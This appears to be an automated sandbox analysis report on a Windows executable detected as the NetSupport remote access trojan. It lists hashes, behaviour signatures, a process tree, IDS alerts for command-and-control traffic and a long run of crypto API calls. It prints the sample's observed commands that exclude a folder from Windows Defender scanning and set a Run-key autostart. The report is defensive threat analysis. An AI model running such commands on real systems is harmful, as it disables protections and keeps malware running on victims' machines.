Windows Analysis Report
BUenB12U2a.exe

Overview

General Information

Sample name: BUenB12U2a.exe (renamed because original name is a hash value)
Original sample name: 9664f030fe62eaa5700779637bd7538d.exe
Analysis ID: 1621635
MD5: 9664f030fe62eaa5700779637bd7538d
SHA1: 2602684192c5b8371a5cf9ecce6af2bb659b1cfb
SHA256: 76198df455918be9c9570ad2199e38b0e8bf4b2ff11b9ed5ab3f0af8f9e3e275
Tags: exe, NetSupport, user-abuse_ch

Detection

NetSupport RAT
Score: 92
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Found pyInstaller with non standard icon
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to record screenshots
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • BUenB12U2a.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\BUenB12U2a.exe" MD5: 9664F030FE62EAA5700779637BD7538D)
    • BUenB12U2a.exe (PID: 6284 cmdline: "C:\Users\user\Desktop\BUenB12U2a.exe" MD5: 9664F030FE62EAA5700779637BD7538D)
      • cmd.exe (PID: 6356 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\extracted\client32.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • client32.exe (PID: 3452 cmdline: C:\Users\user\AppData\Roaming\extracted\client32.exe MD5: C4F1B50E3111D29774F7525039FF7086)
      • powershell.exe (PID: 6352 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5664 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 5752 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • client32.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Roaming\extracted\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 932 cmdline: "C:\Users\user\AppData\Roaming\extracted\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\extracted\AudioCapture.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\extracted\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
00000009.00000002.1882255338.000000006CE09000.00000004.00000001.01000000.00000017.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000001.00000003.2010596571.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000006.00000002.3578238205.000000006CE09000.00000004.00000001.01000000.00000017.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000001.00000003.2004945513.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
9.2.client32.exe.72a00000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
9.2.client32.exe.6cde0658.4.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
9.2.client32.exe.6cde0658.4.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
6.2.client32.exe.a60000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
12.2.client32.exe.10700000.1.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BUenB12U2a.exe", ParentImage: C:\Users\user\Desktop\BUenB12U2a.exe, ParentProcessId: 6284, ParentProcessName: BUenB12U2a.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", ProcessId: 6352, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\extracted\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\BUenB12U2a.exe, ProcessId: 6284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client32
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BUenB12U2a.exe", ParentImage: C:\Users\user\Desktop\BUenB12U2a.exe, ParentProcessId: 6284, ParentProcessName: BUenB12U2a.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", ProcessId: 6352, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BUenB12U2a.exe", ParentImage: C:\Users\user\Desktop\BUenB12U2a.exe, ParentProcessId: 6284, ParentProcessName: BUenB12U2a.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", ProcessId: 6352, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-22T02:46:40.112439+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 64.190.113.159 | 1488 | TCP
2025-02-22T02:46:47.874318+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 64.190.113.159 | 1488 | TCP
2025-02-22T02:46:48.186922+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 64.190.113.159 | 1488 | TCP
2025-02-22T02:46:48.578074+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 64.190.113.159 | 1488 | TCP
2025-02-22T02:47:48.781474+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 64.190.113.159 | 1488 | TCP
2025-02-22T02:48:48.875222+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 64.190.113.159 | 1488 | TCP

AV Detection

Source: BUenB12U2a.exe, Virustotal: Detection: 38%
Source: BUenB12U2a.exe, ReversingLabs: Detection: 34%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 99.9% probability
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B20EF CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B20EF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1483 CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1483
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB113210 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,1_2_00007FFDFB113210
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BB200 CRYPTO_clear_free,1_2_00007FFDFB0BB200
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BF060 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB0BF060
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB11B0D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB11B0D0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2121 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B2121
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1262 X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,1_2_00007FFDFB0B1262
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB1010C0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB1010C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0DD0C0 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,1_2_00007FFDFB0DD0C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB111126 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFB111126
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BD140 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0BD140
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B108C ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFB0B108C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB107770 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB107770
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB129790 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,1_2_00007FFDFB129790
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1582 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFB0B1582
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C97B0 CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFB0C97B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BF7F0 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,1_2_00007FFDFB0BF7F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB119850 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB119850
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B11DB EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFDFB0B11DB
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B19E7 CRYPTO_free,1_2_00007FFDFB0B19E7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B162C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,1_2_00007FFDFB0B162C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB127820 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_new,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB127820
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1846 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,OPENSSL_sk_num,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1846
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2522 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B2522
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB10F660 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB10F660
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B176C CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,1_2_00007FFDFB0B176C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C7730 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFB0C7730
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1087 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,1_2_00007FFDFB0B1087
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B25D6 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,1_2_00007FFDFB0B25D6
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0DD750 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFDFB0DD750
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F35E0 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0F35E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1646 EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_id,EVP_PKEY_get_id,EVP_PKEY_get_id,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,EVP_DigestVerify,ERR_new,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,1_2_00007FFDFB0B1646
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B193D CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B193D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0E3460 CRYPTO_malloc,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,ERR_set_debug,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0E3460
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1023 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B1023
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FF490 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0FF490
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C14E0 CRYPTO_free,CRYPTO_strndup,1_2_00007FFDFB0C14E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B12CB CRYPTO_THREAD_run_once,1_2_00007FFDFB0B12CB
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB125540 CRYPTO_memcmp,1_2_00007FFDFB125540
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BF540 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_derive_set_peer,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,1_2_00007FFDFB0BF540
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B4BD0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B4BD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1F87 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1F87
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2464 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B2464
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F2C10 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFB0F2C10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0CEC00 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,1_2_00007FFDFB0CEC00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0E4C28 EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFB0E4C28
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB106C40 CRYPTO_realloc,1_2_00007FFDFB106C40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B20E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B20E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B117C _time64,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B117C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F8A90 CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFB0F8A90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B110E EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,1_2_00007FFDFB0B110E
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B4B10 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B4B10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B213F EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFB0B213F
